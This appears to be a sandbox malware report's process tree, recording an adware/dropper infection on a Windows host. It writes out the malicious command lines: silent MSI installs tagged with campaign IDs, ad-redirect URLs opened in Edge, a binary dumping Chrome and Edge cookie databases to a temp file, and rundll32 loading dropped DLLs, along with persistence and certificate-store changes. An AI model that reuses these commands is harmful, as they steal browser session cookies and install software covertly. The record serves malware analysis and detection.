C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x128,0x12c,0x130,0xf8,0x134,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x128,0x12c,0x130,0xf8,0x134,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721510⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311910⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb471811⤵
-
C:\Users\Admin\AppData\Local\Temp\4d-76cb9-41c-d54a6-3a241b7d81929\Xuvylitadae.exe"C:\Users\Admin\AppData\Local\Temp\4d-76cb9-41c-d54a6-3a241b7d81929\Xuvylitadae.exe"9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pg4myhyb.nim\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\pg4myhyb.nim\installer.exeC:\Users\Admin\AppData\Local\Temp\pg4myhyb.nim\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pg4myhyb.nim\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pg4myhyb.nim\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849081 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ymcl0sd4.nao\ufgaa.exe & exit10⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\ymcl0sd4.nao\ufgaa.exeC:\Users\Admin\AppData\Local\Temp\ymcl0sd4.nao\ufgaa.exe11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exeC:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exe11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exe"C:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exe" -q12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 139213⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 136813⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 137613⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849081 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"7⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849081 /qn CAMPAIGN=""710"" " CAMPAIGN="710"7⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=7156⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849081 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"7⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 19087⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv spk7Mq6mdk6K+NQLk1ou5Q.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 4523⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1096 -ip 10961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4504 -ip 45041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5556 -ip 55561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5276 -ip 52761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5288 -ip 52881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5340 -ip 53401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5592 -ip 55921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5192 -ip 51921⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 4483⤵
- Suspicious use of SetThreadContext
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2000 -ip 20001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 746450773384A016A2AFC0A8030AEDA5 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EED348EC35EAE2F5393D136883315BB8 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1F4A76F4E90F1B5C39492027BD6B7113 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3AD28EA06C7BA358D002BA422BE6650A2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F1A54687B998F4DB192D8541B949025D C2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default3⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--PH33"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0xac,0xb0,0x20c,0x1f0,0x210,0x7ff9ead29ec0,0x7ff9ead29ed0,0x7ff9ead29ee05⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:25⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --mojo-platform-channel-handle=2012 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --mojo-platform-channel-handle=2408 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2536 /prefetch:15⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --mojo-platform-channel-handle=3160 /prefetch:85⤵
- Loads dropped DLL
-
